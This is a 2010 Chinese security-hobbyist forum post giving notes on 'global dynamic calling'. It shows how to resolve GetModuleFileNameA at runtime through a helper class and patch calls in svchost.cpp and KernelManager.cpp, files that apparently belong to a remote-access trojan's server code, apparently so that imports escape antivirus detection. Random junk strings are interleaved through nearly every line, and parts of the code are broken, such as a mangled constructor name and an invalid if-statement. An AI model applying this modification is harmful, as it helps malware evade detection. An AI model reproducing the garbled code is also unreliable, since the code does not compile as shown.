标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
' W9 w' q& s( M, }+ O( S
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
( A( O/ W+ X6 i2 U
----------------------------------------
9 k5 @' R6 L: B6 F# m/ v" f4 p
DTDY.h:
; l9 j& p. i1 ] D
$ g' r8 u' O1 n; f
#if _MSC_VER>1000
& e8 M. l1 J* l
#pragma once
; p) L6 R8 N( ^4 ]4 e. ]2 X
#endif //_MSC_VER>1000
0 }- C7 K0 X4 c; w
#include<windows.h>
$ B1 |' p5 t* c- z: _
4 ^7 g" C# b5 d2 [$ A
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
0 t; G# l. v1 F* H' I3 Z
class DTDY
# A1 F# |5 u. K: ]& c7 _
{
: Y; N# f$ b, u" r
public:
) I$ m4 f7 m2 q; {" c& x
DTDY();
8 x" p* C5 y$ U2 l; D
virtual ~DTDY();
, ` a! N* F( L
public:
$ [4 a8 _4 l6 `" Z. [
static pGetModuleFileNameA MyGetModuleFileName;
8 i I" n# |: w' M6 o1 [
static BOOL FunInitiallization();
& }* T* q! c" \3 r
};
# p5 l9 I7 D; H# [8 c
#endif
* U0 y/ b; b& T: U
----------------------------------------
' s6 K$ _0 q* N) @# j3 C% R" Y
8 H5 P* Z# ~3 l) I1 ^# W2 X) z
DTDY.cpp:
2 w: A4 j& }0 w X: |" _
& T6 a/ A, `$ `/ `, w! S
#include "DTDY.h"
8 M# D8 K9 u5 f- u/ V, i* t. e
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
' }! [9 Z3 Y8 L! ?
DTDY:TDY()
4 k: X0 M7 _8 R" d0 ?
{
8 t* v( `% O0 D4 |* V: S1 o
}
9 W T1 e" L% S
DTDY::~DTDY()
. S( t- u6 u) h& w! \
{
2 [! y2 w1 w3 M! _
}
. ]2 s) h" }9 m& d( o! Z1 W
BOOL DTDY::FunInitiallization()
! }+ [ E4 U* P6 i$ ^3 Q
{
0 s; m% ]( C' T+ X6 C* O+ M
HMODULE hModule=LoadLibrary("kernel32.dll");
2 e0 l' @; w9 ?/ V. V) |
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
+ q |* W+ J3 P- K$ k
if(!MyGetModuleFileName=) return FALSE;
2 |. l% K: Y7 s' @' V# Q
3 K1 X5 O! p, L5 ~1 V# X, U
return TRUE;
- W1 [: f" d: ?3 G( ^
}
( P: u* P) L8 B
----------------------------------------
4 w3 I' D/ Y( m: C% S, O
svchost.cpp:
5 v. O! \( \% F \2 O
_& Z" [. q5 O/ y( M6 S: h+ ~8 X* o
#include "DTDY.h"
- u# q2 C+ p# z
/ {5 l2 L* p& N, q, |
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
9 f6 _5 I' ]8 i. J. A: ]
{
( \6 t0 \6 F/ i: q+ m# M5 u
switch(ul_reason_for_call)
% l4 x8 a0 a9 a2 M5 B
{
. H5 d. T* _6 T! [
case DLL_PROCESS_ATTACH:
7 d1 g, o" E" D, d- B, f+ y9 i
if(!DTDY::FunInitiallization()) return FALSE;
9 V, M# e3 H0 }2 D1 e
t# r$ ?8 o6 ?3 b' j* b# e
break;
. K' J: e# D1 ]- Z( G3 G; H
}
+ a9 U& b' C4 |: _
}
, L! H+ |0 y; ~7 x# Z5 P; f
( U7 d+ X9 u3 Z, v N% a
* X, H# F4 h8 r! l3 k5 ?) d6 {
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
5 O% m- j5 V: a; z' `. P( b4 Q/ v
改写为
" m' k" b& P( }- o$ F5 z
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
+ N7 m8 @0 w' [/ v5 S1 d
----------------------------------------
) k: l1 V: n; G9 k$ O( `
KernelManager.cpp:
; \4 Y6 {1 ~' M# r+ Q
& T8 Y4 H0 t5 Y+ ]
#include "../DTDY.h"
N% E+ R( a1 L7 h$ T Q
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 Z: T- w+ |+ G$ e7 g) Y, L, B2 z
改写为
2 B$ }7 C, O7 h: r4 u
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
" s- |5 {) e- y) x
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
